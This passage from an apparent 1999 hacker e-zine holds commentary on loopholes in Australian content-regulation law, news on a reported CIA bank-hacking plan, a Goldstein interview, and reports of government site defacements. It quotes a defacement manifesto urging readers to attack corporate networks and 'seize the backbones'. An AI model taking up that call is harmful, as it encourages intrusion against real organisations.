  2221.      I'll start this one by displaying two rather lengthy but important subclauses of the legislation, both of which describe possible means to
  2222.      evade content regulation by installing (but presumably not using) one of the currently-available end-user filtering pieces of software.
  2223.      Firstly Subclause 40(4-7): 
  2224.  
  2225.           40 Action to be taken in relation to a complaint about prohibited content hosted outside Australia 
  2226.  
  2227.                     (1) - (3)
  2228.                     
  2229.           Recognised alternative access-prevention arrangements 
  2230.  
  2231.                 (4) An Internet service provider is not required to comply with a standard access-prevention
  2232.                     notice in relation to a particular end-user if access by the end-user is subject to a
  2233.                     recognised alternative access-prevention arrangement(as defined by subclause (5)) that
  2234.                     is applicable to the end-user. 
  2235.                     
  2236.                 (5) The ABA may, by written instrument, declare that a specified arrangement is a recognised
  2237.                     alternative access-prevention arrangement for the purposes of the application of this Division
  2238.                     to one or more specified end-users if the ABA is satisfied that the arrangement is likely to
  2239.                     provide a reasonably effective means of preventing access by those end-users to prohibited
  2240.                     content and potential prohibited content.
  2241.                     
  2242.                     Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901.
  2243.                     
  2244.                 (6) The following are examples of arrangements that could be declared to be recognised alternative
  2245.                     access-prevention arrangements under subclause
  2246.                     
  2247.                 (5): 
  2248.                       (a) an arrangement that involves the use of regularly updated Internet content filtering software; 
  2249.                       (b) an arrangement that involves the use of a "family-friendly" filtered Internet carriage service.
  2250.                        
  2251.                 (7) An instrument under subclause (5) is a disallowable instrument for the purposes of section 46A
  2252.                     of the Acts Interpretation Act 1901
  2253.  
  2254.      and Subclause 60(3-8): 
  2255.  
  2256.           60 Matters that must be dealt with by industry codes and industry standards 
  2257.  
  2258.                 (1) - (2)
  2259.  
  2260.           Designated alternative access-prevention arrangements 
  2261.  
  2262.                 (3) An industry code or an industry standard may provide that an Internet service provider is not
  2263.                     required to deal with Internet content notified under paragraph 40(1)(b) of this Schedule or
  2264.                     clause 46 by taking steps to prevent particular end-users from accessing the content if access
  2265.                     by the end-users is subject to an arrangement that is declared by the code or standard to be a
  2266.                     designated alternative access-prevention arrangement for the purposes of the application of this
  2267.                     clause to those end-users. 
  2268.                     
  2269.                 (4) An industry code developed by a body or association must not declare that a specified arrangement
  2270.                     is a designated alternative access-prevention arrangement for the purposes of the application of
  2271.                     this clause to one or more specified end-users unless the body or association is satisfied that the
  2272.                     arrangement is likely to provide a reasonably effective means of preventing access by those end-users
  2273.                     to prohibited content and potential prohibited content. 
  2274.                     
  2275.                     Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901.
  2276.                     
  2277.                 (5) An industry standard made by the ABA must not declare that a specified arrangement is a designated
  2278.                     alternative access-prevention arrangement for the purposes of the application of this clause to one
  2279.                     or more specified end-users unless the ABA is satisfied that the arrangement is likely to provide a
  2280.                     reasonably effective means of preventing access by those end-users to prohibited content and potential
  2281.                     prohibited content. 
  2282.                     
  2283.                     Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901.
  2284.                     
  2285.                 (6) The following are examples of arrangements that could be declared to be designated alternative
  2286.                     access-prevention arrangements: 
  2287.                       (a) an arrangement that involves the use of regularly updated Internet content filtering software; 
  2288.                       (b) an arrangement that involves the use of a "family-friendly" filtered Internet carriage service. 
  2289.                       
  2290.                 (7) For the purposes of this Schedule, if an industry code: 
  2291.                       (a) deals to any extent with procedures to be followed by Internet service providers in dealing
  2292.                           with Internet content notified under paragraph
  2293.                       40(1)(b) of this Schedule or clause 46; and 
  2294.                       (b) makes provision as mentioned in subclause (3); 
  2295.                 then: 
  2296.                       (c) the code is taken to deal with the matter set out in paragraph (2)(d); and 
  2297.                       (d) the code is taken to be consistent with subclause (2). 
  2298.                       
  2299.                 (8) For the purposes of this Schedule, if an industry standard: 
  2300.                       (a) deals to any extent with procedures to be followed by Internet service providers in dealing
  2301.                           with Internet content notified under paragraph
  2302.                       40(1)(b) of this Schedule or clause 46; and 
  2303.                       (b) makes provision as mentioned in subclause (3); 
  2304.                 then: 
  2305.                       (c) the standard is taken to deal with the matter set out in paragraph (2)(d); and 
  2306.                       (d) the standard is taken to be consistent with subclause (2). 
  2307.  
  2308.      Now, if you've made it through all of that, you'll note a single key thing - that subject to appropriate industry codes and standards, it
  2309.      may be possible to have an unfiltered internet feed delivered to you if you have an end-user filtering system installed on your computer.
  2310.      The means of evasion here? Turn the filter off. Not exactly rocket science, is it? 
  2311.  
  2312.      Mirror content so widely as to prevent effective enforcement of the legislation 
  2313.  
  2314.      As with the two previous means of evasion, I will begin by displaying several pieces of the legislation. First up is Clause 36: 
  2315.  
  2316.           36 Anti-avoidance-special take-down notices 
  2317.  
  2318.                 If: 
  2319.                       (a) an interim take-down notice or a final take-down notice relating to particular Internet
  2320.                           content is applicable to a particular Internet content host; and 
  2321.                       (b) the ABA is satisfied that the Internet content host is hosting in Australia, or is proposing
  2322.                            to host in Australia, Internet content (the similar Internet content) that is the same as,
  2323.                            or substantially similar to, the Internet content identified in the interim take-down notice
  2324.                            or the final take-down notice, as the case may be; and 
  2325.                       (c) the ABA is satisfied that the similar Internet content is prohibited content or potential
  2326.                           prohibited content; 
  2327.                 the ABA may give the Internet content host a written notice (a special take-down notice) directing the
  2328.                 host not to host the similar Internet content at any time when the interim take-down notice or final
  2329.                 take-down notice, as the case may be, is in force. 
  2330.  
  2331.      Clause 36 appears to apply to mirrored information or, quite possibly, a website consisting of different layout/text but identical images.
  2332.      I'll now move onto Clauses 46 and 47: 
  2333.  
  2334.           46 Anti-avoidance-notified Internet content 
  2335.  
  2336.                 (1) If: 
  2337.                       (a) particular Internet content has been notified to Internet service providers as mentioned
  2338.                           in Paragraph 40(1)(b) of this Schedule; and 
  2339.                       (b) the notification has not been withdrawn; and 
  2340.                       (c) the ABA is satisfied that Internet content (the similar Internet content) that is the same
  2341.                           as, or substantially similar to, the first-mentioned Internet content is being hosted
  2342.                           outside Australia; and 
  2343.                       (d) the ABA is satisfied that the similar Internet content is prohibited content or potential
  2344.                           prohibited content; and 
  2345.                       (e) a code registered, or standard determined, under Part 5 of this Schedule deals with the
  2346.                           matters referred to in subclause 60(2); 
  2347.                 the ABA must notify the similar Internet content to Internet service providers under the designated
  2348.                 notification scheme set out in the code or standard, as the case may be. 
  2349.                 
  2350.                 (2) If: 
  2351.                       (a) particular Internet content is notified to Internet service providers as mentioned in
  2352.                           Paragraph 40(1)(b) of this Schedule; and 
  2353.                       (b) as a result of the application of subclause (1) to that content, the ABA notifies similar
  2354.                           Internet content to Internet service providers in accordance with subclause (1); and 
  2355.                       (c) the notification of the first-mentioned content is withdrawn; 
  2356.                 the notification of the similar Internet content is taken to have been withdrawn. 
  2357.                 
  2358.                 (3) If: 
  2359.                       (a) a notification of Internet content is withdrawn under subclause (2); and 
  2360.                       (b) a code registered, or standard determined, under Part 5 of this Schedule deals with the
  2361.                           matters referred to in subclause 60(2); 
  2362.                 the ABA must notify the withdrawal to Internet service providers under the designated notification
  2363.                 scheme set out in the code or standard, as the case may be. 
  2364.  
  2365.           47 Anti-avoidance-special access-prevention notice 
  2366.  
  2367.                 (1) If: 
  2368.                       (a) a standard access-prevention notice relating to particular Internet content is applicable
  2369.                           to a particular Internet service provider; and 
  2370.                       (b) the ABA is satisfied that the Internet service provider is supplying an Internet carriage
  2371.                           service that enables end-users to access Internet content (the similar Internet content)
  2372.                           that is the same as, or substantially similar to, the Internet content identified in the
  2373.                           standard-access prevention notice; and 
  2374.                       (c) the ABA is satisfied that the similar Internet content is prohibited content or potential
  2375.                           prohibited content; the ABA may give the provider a written notice (special access-prevention
  2376.                           notice) directing the provider to take all reasonable steps to prevent end-users from accessing
  2377.                           the similar Internet content at any time when the standard access-prevention notice is in force. 
  2378.                           
  2379.                           Note: The ABA may be taken to have given a notice under this clause-see clause 51. 
  2380.                           
  2381.                 (2) For the purposes of subclause (1), in determining whether particular steps are reasonable, regard must be had to: 
  2382.                       (a) the technical and commercial feasibility of taking the steps; and 
  2383.                       (b) the matters set out in subsection 4(3). 
  2384.                       
  2385.                 (3) Subclause (2) does not, by implication, limit the matters to which regard must be had. 
  2386.  
  2387.                 recognised alternative access-prevention arrangements 
  2388.  
  2389.                 (4) An Internet service provider is not required to comply with a special access-prevention notice in
  2390.                     relation to a particular end-user if access by the end-user is subject to a recognised alternative
  2391.                     access-prevention arrangement (as defined by subclause 40(5)) that is applicable to the end-user.
  2392.  
  2393.  
  2394.      The means of avoidance here would be purely and simply mirroring content so widely and in so many derivative (and possibly dissimilar)
  2395.      forms that even the process of generating take-down notices and notifying internet services providers would bog down the ABA and
  2396.      the OFLC. 
  2397.  
  2398.      Commentary 
  2399.  
  2400.      The intent of this legislation, as stated by the government, was to prevent children accessing "illegal and offensive" material on the
  2401.      Internet. More specifically, they made reference in various forums to pornographic material. My concern is not that responsible adults
  2402.      will be prevented from accessing this material, but that the legislation does not explicitly define what else might be regulated on the
  2403.      whim of a misguided Government minister or influential moral crusader within the ranks of the ABA or OFLC. 
  2404.  
  2405.      One example of what might be banned is the BugTraq mailing list. This list contains "full disclosure" discussions of computer software
  2406.      bugs, including in some cases explicit instructions on how to break into computers. What might be easily overlooked in any such
  2407.      government review of this material is the fact that in most cases, such information is accompanied by further instructions on how to
  2408.      secure any vulnerable computers. 
  2409.  
  2410.      Another oft-quoted example of how an overzealous filter might exclude important content is in the area of health. Breast cancer.
  2411.      Sexually-transmitted diseases. Contraception. If it's got any of the words filtered by Senator Alston's favoured filtering solution, iFilter
  2412.      (a number of them listed here), chances are your friendly neighbourhood ISP will be told to ban it long before you see it. 
  2413.  
  2414.      Conclusion 
  2415.  
  2416.      As you can see, there's a number of loopholes in the legislation that our government has pushed through parliament, and most of them
  2417.      allow a mildly intelligent citizen to quite legally evade any form of content regulation. Far from suggesting that this legislation should be
  2418.      heavier-handed than it already is in restricting people from accessing the information they want, I am suggesting that it should have
  2419.      been thrown out by the Paliament on the basis that it is fundamentally flawed and unenforceable. 
  2420.  
  2421.      Instead, and without fear tactics or moralist rhetoric, the Government could have instituted a public education campaign informing
  2422.      parents about the need to restrict unsupervised/unfiltered access to the Internet with young children (5-13) and begin a dialogue
  2423.      about personal responsibility and self moderation with older ones (13 and up). As a young person that has grown up in the midst of
  2424.      computers and communication technologies, I believe this would have achieved a much more productive outcome. 
  2425.  
  2426.      Feedback 
  2427.  
  2428.      Given that this is a layperson's analysis of the legislation, I invite any and all comment from similarly concerned citizens, and in
  2429.      particular citizens familiar with legal matters that may be able to provide further insight. 
  2430.  
  2431.      Please feel free to make comments to webmaster@2600.org.au. 
  2432.       
  2433.       @HWA
  2434.       
  2435.  08.0 Can the CIA break into banks?
  2436.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2437.       
  2438.       Can CIA Break Into Banks? 
  2439.  
  2440.  
  2441.       contributed by Weld Pond 
  2442.       Last week Newsweek reported that the CIA was
  2443.       planning to electronically break into unnamed banks to
  2444.       get at Slobodan Milosevic's money. How realistic is this?
  2445.       Is it possible and if so what are the international
  2446.       implications? MSNBC takes a look at these questions and more. 
  2447.  
  2448.       MSNBC
  2449.       http://www.msnbc.com:80/news/274526.asp
  2450.  
  2451.       Newsweek   
  2452.       http://www.newsweek.com/nw-srv/printed/us/in/in0922_1.htm
  2453.  
  2454.       MSNBC;
  2455.  
  2456.       
  2457.       Experts argue plan to raid MilosevicÆs bank accounts would
  2458.       do more harm than good
  2459.                                                  By Bob Sullivan
  2460.                                                            MSNBC
  2461.  
  2462.       May 28 ù It sounded like a Tom Clancy spy novel.
  2463.       Newsweek reported last week that the CIA was
  2464.       planning to tinker with international bank
  2465.       accounts full of Slobodan MilosevicÆs money ù
  2466.       just another way of getting under the Yugoslav
  2467.       presidentÆs skin. Information warfare experts
  2468.       disagree about the feasibility of such a
  2469.       cyberattack. But thereÆs little disagreement the
  2470.       U.S. stands to lose much more than it might gain
  2471.       from firing the first volley in such an infomation
  2472.       war. In fact, some believe damage has already
  2473.       been done.
  2474.       
  2475.       
  2476.       THE NEWSWEEK STORY RAISED several issues:
  2477.       What international laws would govern a U.S.-backed attack
  2478.       on a bank in a third-party nation? Is such an attack feasible
  2479.       in the first place? What kind of retaliation might U.S.
  2480.       citizens, and their bank accounts, face? But most important,
  2481.       what does even the possibility of such an attack do to the
  2482.       integrity of international banking systems?
  2483.              The story on the cyberattack ù fact, fiction or
  2484.       somewhere in between ù could already have put the U.S.
  2485.       at risk, said Kawika Daguio, executive vice president of the
  2486.       Financial Information Protection Association. 
  2487.              Banking systems hinge on public confidence. You put
  2488.       the money in; youÆre confident youÆll be able to take the
  2489.       money out. If thereÆs any hint you might not be able to get at
  2490.       your money, youÆd withdraw it. Any attack on the integrity
  2491.       of a banking system anywhere ù particularly when
  2492.       retaliation seems like such an obvious possibility ù chips
  2493.       away at public confidence.
  2494.              ôIt bothers me because we have had conversations
  2495.       with the defense and intelligence community. We thought
  2496.       this was off the table,ö Daguio said. ôWeÆve had discussions
  2497.       with rather senior policy-makers. We thought they
  2498.       understood the importance of protecting public confidence
  2499.       in the payment system.ö
  2500.              But retaliation by foreign agents might be just one
  2501.       source of insecurity for U.S. account holders. ThereÆs
  2502.       another: If the government can and is willing to tinker with
  2503.       foreign accounts, what will stop it from tinkering with mine?
  2504.              
  2505.              Could U.S. agents hijack MilosevicÆs money, allegedly
  2506.       stashed away in foreign banks? Yes and no. 
  2507.              Experts agree that the CIA has had the know-how to
  2508.       control bank accounts for years, through old-fashioned
  2509.       non-cyber methods, such as coercing bank authorities, or
  2510.       even through legal methods such as freezing accounts. 
  2511.              On the other hand, itÆs not easy when the target
  2512.       knowns whatÆs coming. According to MSNBC analyst Bill
  2513.       Arkin, the international community, including UNSCOM, is
  2514.       still trying to get its hands on Saddam HusseinÆs assets. 
  2515.              And such real-world tactics are a far cry from the
  2516.       cyberwar image of a few CIA hackers sitting at a keyboard
  2517.       moving around money thanks to an Internet connection and
  2518.       some wits. ThereÆs disagreement about how possible that
  2519.       might be.
  2520.              ôThe audits we have performed tell us [banks] are not
  2521.       invulnerable,ö says a security expert identifying himself as
  2522.       Space Rogue. Rogue works at L0pht Heavy Industries,
  2523.       which hires out to hack corporate computer systems to test
  2524.       their vulnerability. ôBanks have a little more security in
  2525.       place, but that security is still not at a level where itÆs
  2526.       unbreakable.ö While money systems arenÆt connected to the
  2527.       public Internet, ôsometimes they have a modem dangling off
  2528.       for remote access, or they use cryptography, but not
  2529.       correctly,ö he said. 
  2530.              Others suggest cracking a bank that holds Milosevic
  2531.       money ù outside the more traditional methods ù is nearly
  2532.       impossible. 
  2533.       
  2534.           ôI deal in probabilities, and IÆve never seen it,ö said a
  2535.       man identifying himself as Louis Cipher, a principal investor
  2536.       in Infowar.com. Cipher is also in charge of security at what
  2537.       he says is the ôsixth-largest brokerage in America.ö He
  2538.       suggested very few individuals have the skills necessary to
  2539.       ôtunnelö from an Internet connection through mainframe
  2540.       systems in banks ù in fact, a team of specialists and inside
  2541.       information would be required.
  2542.              ôYouÆd have to be an applications specialist to even
  2543.       navigate to a screen,ö he said. ôYouÆre talking well beyond
  2544.       the skills of hackers. It would have to be an insider working
  2545.       with Job Control Language sitting on the mainframe. The
  2546.       only one who would have that ability other than the U.S.
  2547.       government would be organized crime.ö
  2548.              And Cipher is skeptical about the U.S. governmentÆs
  2549.       ability to hire and hold the brightest minds in the security
  2550.       industry ù since no government agency can match the lure
  2551.       of stock options offered by a high-tech firm.
  2552.              Still, even the possibility of the U.S. using a wired
  2553.       computer to move MilosevicÆs money drew swift reaction
  2554.       from information warfare observers. Even hacker groups
  2555.       protested the notion, with a hacker calling himself ôsixtoedö
  2556.       setting up a Web page in protest. The reason: Since the
  2557.       U.S. relies more on technology and information than any
  2558.       other nation, it stands to lose the most from such a
  2559.       cyberwar. 
  2560.  
  2561.              ôI am not one for an information arms race,ö said Frank
  2562.       Cilluffo, senior analyst at the Center for Strategic and
  2563.       International Studies in Washington. ôWe will lose that
  2564.       race.... WeÆre a hell of a lot more susceptible to retaliation.
  2565.       The defensive implications outweigh the offensive
  2566.       implications.ö
  2567.              Anyone can build up an information warfare capability,
  2568.       Cilluffo said. And itÆs much more like guerrilla war than
  2569.       nuclear war ù itÆs easy for the enemy to hide, and thereÆs
  2570.       no real deterrent. Therefore, retaliation could be swift and
  2571.       indiscriminate. 
  2572.              In addition, there is a general principle among security
  2573.       experts suggesting once a systemÆs security is
  2574.       compromised, itÆs much easier to compromise a second
  2575.       time. So the U.S. could very well be paving the way for
  2576.       retribution.
  2577.              
  2578.       WHY NO DENIALS?
  2579.              Fear of such retaliation attempts, or even the
  2580.       perception of such retaliation attempts, drove Daguio to
  2581.       start calling his friends on the intelligence community to
  2582.       complain as soon as the Newsweek story hit. He has yet to
  2583.       receive the reassurance he was hoping for. 
  2584.              ôIf itÆs true or itÆs just leaks, itÆs bad to have the story
  2585.       out there,ö Daguio said. ôI have yet to have anyone tell me
  2586.       æDonÆt worry, everythingÆs OK.Æ ... If they havenÆt done
  2587.       anything, the most appropriate thing to do is to come out
  2588.       and say theyÆre not doing it.ö 
  2589.  
  2590.                 The CIA isnÆt doing that; a spokesperson told
  2591.       MSNBC the agency couldnÆt comment on its activities, but
  2592.       one source familiar with U.S. intelligence capabilities tells
  2593.       MSNBC to be ôvery skepticalö of the Newsweek story.
  2594.              Meanwhile, opening the PandoraÆs box of cyberwar
  2595.       would lead to a series of yet-to-be answered questions.
  2596.       International law isnÆt ready to handle such conflicts, says
  2597.       Cilluffo ù so if the U.S. broke into a bank in Cyprus, what
  2598.       laws would govern that act? And could the compromised
  2599.       bank sue the U.S. government?
  2600.              ôWhat are the rules of engagement here?ö Cilluffo
  2601.       asked. ôWhat is game, what is not game? This may be a
  2602.       harbinger of how we prosecute and wage war in the future.ö
  2603.                                  
  2604.       @HWA
  2605.       
  2606.  09.0  Emmanuel Goldstein Interview 
  2607.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2608.        
  2609.        From HNN http://www.hackernews.com/  
  2610.  
  2611.        contributed by cult_hero 
  2612.        Adam Peneberg of Forbes writes a good long article
  2613.        after interviewing the editor of 2600 and the on air
  2614.        personality of "Off the Hook", Emmanuel Goldstein. 
  2615.  
  2616.        Forbes    
  2617.        http://www.forbes.com/penenberg/
  2618.        
  2619.       RECENTLY, I met with Emmanuel Goldstein, publisher of the hacker
  2620.       zine 2600, at the New York City radio station WBAI. 2600, a slender
  2621.       volume containing articles about hacking, phone phreaking and tips
  2622.       for pirating videogames, has been around since 1984. Goldstein, a
  2623.       mainstay in the hacker world since he was a teenager, has hosted "Off
  2624.       the Hook," a weekly radio program, for more than ten years. 
  2625.  
  2626.       When I asked Goldstein, whose real name is Eric Corley, which
  2627.       name he preferred, his response was, "Call me whatever you want,
  2628.       but the reason I changed it is because I didn't like Eric Corley.
  2629.       The name Emmanuel Goldstein, which comes from a character in
  2630.       Orwell's 1984, suits me much better--and many more people know
  2631.       me as Emmanuel." 
  2632.  
  2633.       Goldstein, 39, long, scraggly hair streaked with gray
  2634.       poking out from under a 2600 baseball cap, was
  2635.       enmeshed in hacker culture long before there was an
  2636.       information superhighway. In 1983 he broke into
  2637.       computer systems at NASA, Coca-Cola, Raytheon
  2638.       and the Executive Office of the President of the United
  2639.       States. How was he able to get in? They were all
  2640.       using the same E-mail system, and Goldstein
  2641.       discovered that if he typed the letter "A," he could get
  2642.       the default password, which would allow him to gain
  2643.       access to the system. He then used these
  2644.       companies' mail systems to send E-mail to other
  2645.       hackers. 
  2646.  
  2647.       Initially, he was charged with a whopping ten counts of
  2648.       wire fraud, each with a possible sentence of five years.
  2649.       This was the first time, he says, he experienced the
  2650.       government hyping the threat of computer crime. 
  2651.  
  2652.       "I freely admitted what I did: It was an offense, but not
  2653.       a crime," Goldstein says. "I showed them what was
  2654.       wrong with their system: "'Don't use the letter 'A' for
  2655.       your default password,'" I told them. "They gave me
  2656.       probation for a year and I had to pay $200 for
  2657.       computer time. Then they let me go." 
  2658.  
  2659.       These days, Goldstein spends most of his time
  2660.       working on behalf of his friend, Kevin Mitnick, the
  2661.       hacker poster boy who has been in prison for more
  2662.       than four years for illegally copying and hoarding
  2663.       proprietary software. Goldstein helps run two web
  2664.       sites dedicated to the cause, and is in the process of
  2665.       filming a documentary about Mitnick. 
  2666.  
  2667.       "There is a lot of fear and paranoia about hackers, and
  2668.       it's not getting any better," he says. "The government
  2669.       needs a threat in order to justify its existence, and we
  2670.       are a convenient scapegoat, since most people really
  2671.       don't understand what we do. They claim that hackers
  2672.       do this and do that, they spread viruses and wreak
  2673.       havoc and destroy systems, and this is hard to
  2674.       dispel." 
  2675.  
  2676.       For instance, President Clinton, who has proposed
  2677.       earmarking some $1.5 billion to fight cyberterror
  2678.       threats, said in a January speech at the National
  2679.       Academy of Sciences: "We already are seeing the
  2680.       first wave of deliberate cyber attacks--hackers break
  2681.       into government and business computers, stealing and
  2682.       destroying information, raiding bank accounts, running
  2683.       up credit card charges, extorting money by threats to
  2684.       unleash powerful computer viruses." 
  2685.  
  2686.       It sounds like Clinton may have seen too many Keanu
  2687.       Reeve's flicks. Most companies that are hacked suffer
  2688.       web site graffiti. This means the victim company is
  2689.       forced to spend money to improve its security.
  2690.       Embarrassing? Certainly. A threat to business?
  2691.       Hardly, and why was the company's security so lax in
  2692.       the first place? 
  2693.  
  2694.       While it is true that the Pentagon is hacked nearly
  2695.       every hour, that doesn't mean these teenagers (and
  2696.       that's who most of the hackers who go after "big
  2697.       game" like American military sites are) actually come
  2698.       away with anything. And the part about hackers
  2699.       extorting money by threatening to release nasty
  2700.       computer viruses sounds like it could have written by
  2701.       Stephen Glass, the former associate editor of The
  2702.       New Republic, who was busted for fabricating stories. 
  2703.  
  2704.       Yet, each time the hacker menace is blown out of
  2705.       proportion means the cause of the problem is not
  2706.       addressed. Law enforcement can either go after the
  2707.       estimated one million hackers out there in
  2708.       cyberspace, most of them being "script kiddies"
  2709.       possessing basic skills at best, or it could insist that
  2710.       companies that release buggy software chock full of
  2711.       security holes take responsibility for the many holes in
  2712.       their products. 
  2713.  
  2714.       If you bought a car that could be hijacked with
  2715.       off-the-shelf keys made available over the Internet, you
  2716.       might be tempted to sue the automaker for not doing
  2717.       more to secure the vehicle. Yet, since software
  2718.       companies don't technically sell their products, they
  2719.       "lease" them, they are not liable. If they were, they
  2720.       wouldn't release products that could be so easily
  2721.       penetrated by hackers. 
  2722.  
  2723.       But companies like Microsoft have lobbyists. Hackers
  2724.       don't. So don't expect Congress to do much. 
  2725.  
  2726.       Goldstein and Mitnick, who to this day is listed as a
  2727.       staff writer on 2600's masthead, became friends in
  2728.       1989, after Kevin Mitnick's first go around in solitary
  2729.       confinement. (The court, without proof, was afraid that
  2730.       Mitnick could somehow whistle into a telephone and
  2731.       launch nuclear missiles.) While Mitnick, who says he
  2732.       was devastated by his eight months held in a cell no
  2733.       larger than a bathroom, went on the lam from the FBI
  2734.       in the early 1990s, afraid he would be put back in
  2735.       solitary, he called Goldstein almost everyday. 
  2736.  
  2737.       "The day Kevin was arrested, I'd just missed a phone
  2738.       call from him," Goldstein says. "I was sad he hadn't
  2739.       followed my advice to leave the country. I knew what
  2740.       they would do to him." 
  2741.  
  2742.       In the coming months, Takedown, a film based on the
  2743.       book by New York Times reporter John Markoff and
  2744.       Tsutomu Shimomura that details the capture of Kevin
  2745.       Mitnick, is scheduled to come out. Goldstein was able
  2746.       to gain an advance copy of the screenplay and
  2747.       complained bitterly over the evil way Mitnick was
  2748.       portrayed. After Goldstein led a protest outside of
  2749.       Miramax's corporate headquarters, the company made
  2750.       changes to the script. 
  2751.  
  2752.       "It's still crap," he says, "but its more well-rounded
  2753.       crap." 
  2754.  
  2755.       Does Goldstein, who freely admits his hacking skills
  2756.       are modest at best, have any pearls of wisdom to offer
  2757.       about hacking? 
  2758.  
  2759.       "The people I hang out with know far more about
  2760.       technology than I do. When dealing with hackers, he
  2761.       cautions, "always assume you're being lied to." 
  2762.  
  2763.       @HWA
  2764.        
  2765.  10.0  DOD Unplugs From Net as Another Gov Site Gets Hit 
  2766.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2767.  
  2768.        From HNN http://www.hackernews.com/  
  2769.        
  2770.        contributed by info-warrior       
  2771.        In a move spokespeople are calling "proactive" (yeah,
  2772.        right) the Department of Defense has announced that it
  2773.        will be pulling its systems off the net to upgrade
  2774.        security and install a firewall. (About damn time.) The
  2775.        White House has also issued a stern warning to would
  2776.        be crackers saying "You will be caught". Interesting
  2777.        quote from the Washington Post "Securing government
  2778.        Web sites against attack is difficult because the sites
  2779.        are designed for open access." What makes them any
  2780.        more difficult to secure or more open than a corporate
  2781.        web site? 
  2782.  
  2783.        C|Net
  2784.        http://www.news.com/News/Item/0,4,37257,00.html?owv
  2785.        
  2786.        ZD Net
  2787.        http://www.zdnet.com/zdnn/stories/news/0,4586,2268574,00.html?chkpt=hpqs014
  2788.        
  2789.        
  2790.        Washington Post
  2791.        http://www.washingtonpost.com/wp-srv/national/daily/june99/hackers02.htm
  2792.  
  2793.        And the War Continues
  2794.        The latest victim is Brookhaven National Labs. The main
  2795.        web page for the site was defaced late last night by the
  2796.        "Posse". They at least left an interesting message. 
  2797.  
  2798.        HNN Cracked Pages Archive
  2799.        http://www.hackernews.com/archive/crackarch.html
  2800.        
  2801.                                   FBI Crackdown nets 20+ Script Kiddies
  2802.  
  2803.        The Posse would like to take this opportunity to personally thank the script kiddies
  2804.        who keep throwing themselves at the federal government like insects to a buglight.
  2805.        While you have been keeping the FBI (Federal Bureau Of Instigation) and SS (Secret Cervix)
  2806.        busy tracking down 14 year old hacker hopefuls; we have spent our time burrowing ourselves
  2807.        deep within Corporate America.
  2808.  
  2809.        Ecosystems do not grow without antagonists. The internet (like it or not) has become a
  2810.        virtual ecosystem that would wither and die were it not for the intervention of hackers.
  2811.        Corporate America has entered this ecosystem like a viral fungus, growing ugly clusters of
  2812.        .com decay, spreading misinformation like wildfire and causing the natural predators to be 
  2813.        removed from the ecosystem in which they provide a necessary function.
  2814.  
  2815.                                  Corporate America must be removed.
  2816.                                         It's us or them.
  2817.  
  2818.        Take a look at the concrete wastelands that Corporate America has built upon the earth
  2819.        outside your windows. Beneath that concrete there is soil wasted, soil that breeds life.
  2820.  
  2821.                       They are trying to do the same thing to the internet.
  2822.  
  2823.        Go outside and try to breathe for just a moment... That stale thickness in the air that 
  2824.        Threatens to choke you is the poison spewing from their smokestacks... Did you just cough?
  2825.        The phlegm in your throat are their poisons and do you charge them rent ? Did you charge 
  2826.        them storage fees for acting as a receptacle for their toxic waste?
  2827.  
  2828.           They are destroying the world we built to escape the one they have already destroyed!
  2829.  
  2830.        Corporate America will trade 10 years (minimum) of your life in exchange for another $10
  2831.        in profits. Their poisons, their stifling concrete morgues, their so called "progress"...
  2832.  
  2833.        They never knew the rules, they followed you here to stalk you... To bilk you for $10
  2834.        they came here because you did. Then when you got in the way of their "progress" they
  2835.        fabricated losses in order to gain FBI attention. They abuse the system and steal your
  2836.        freedoms. 
  2837.  
  2838.  
  2839.                            Do not blame the FBI, they are playing by the rules...
  2840.                            Do not blame the SS, they are playing by the rules...
  2841.  
  2842.                                         BLAME CORPORATE AMERICA
  2843.                                         BLAME THE GOVERNMENT
  2844.                                         BUT QUIT ATTACKING THE FBI AND SECRET SERVICE!
  2845.  
  2846.                                 YOU ARE PLAYING BY THEIR RULES WHEN YOU DO THIS!
  2847.  
  2848.                 A COMPUTER CRIMINAL IS ACCEPTABLE TO SOCIETY THAT IS WHY WE HAVE COMPUTER CRIME LAWS
  2849.                                                 AND PRISONS!
  2850.  
  2851.                                           ATTACK CORPORATE AMERICA...
  2852.                                           
  2853.                           THE RACE BEGINS... NO MORE .COM'S ON THE INTERNET BY Y2K.
  2854.  
  2855.  
  2856.  
  2857.                                   SEIZE THE BACKBONES! THEY BELONG To YOU! 
  2858.                        CONTROL THE MEDIUMS BY WHICH THESE CORPORATE IDIOTS DO BUSINESS.
  2859.  
  2860.                                       H4ppy Th4nksg1v1ng Turk3yz,
  2861.  
  2862.                                                     The P0sse.
  2863.  
  2864.                                                   Greets out 2:
  2865.                                Gary Dell'Abate, Scott Charney, Gale Thackeray, Terry Atchley, 
  2866.                  Kurt Von Brauch, Don Delaney, Chris Goggans Tsutomu Shimomoura, Justin Tanner Peterson, 
  2867.                      John Markhoff, John Perry Barlow, Netta Gilboa, Corey Braun, Peter "HFG" Shipley,
  2868.                       Berferd, Dan Farmer, Wietse Venema, Dale Drew, Joshua Quittner, Stephanie Hanna,
  2869.                                                      Joe Cuervo and Jim Beam.
  2870.  
  2871.                                          Kick in the colostomy bag out 2:
  2872.  
  2873.                  gH, Eric Burns, mosthated, mindphasr, Kevin Mitnick, Kevin Poulsen, Phiber Optik,
  2874.                 John Draper, Emmanuel Goldstein, SOB!, 9X, EL8, #pascal, team spl0it, attrition.org,
  2875.                     Kit Knox, b4b0, AntiOnline, HackerNews.com, Zo0mer, mozy, m1crochip, in0de, 
  2876.                 #bolo, Red Knight, slack packet, Israeli Ghost, infam0us, f0rpaxe, HFX international,
  2877.                                 kimmy, Rosie O'Donell and all K-MART employees.
  2878.  
  2879.        C|Net;
  2880.        
  2881.      White House threatens to punish hackers 
  2882.      By Reuters
  2883.      Special to CNET News.com
  2884.      June 1, 1999, 3:35 p.m. PT 
  2885.  
  2886.      WASHINGTON--Annoyed by a recent wave of attacks against official U.S. government Web sites, the White House
  2887.      today warned hackers who target federal Web sites that they will be caught and punished.
  2888.  
  2889.      "There's a government-wide effort to make sure that our computer systems remain secure," White House Press Secretary Joe
  2890.      Lockhart said in a briefing. "For those who think that this is some sort of sport, I think [it will be] less fun when the authorities do
  2891.      catch up with them...and these people are prosecuted," he said.
  2892.  
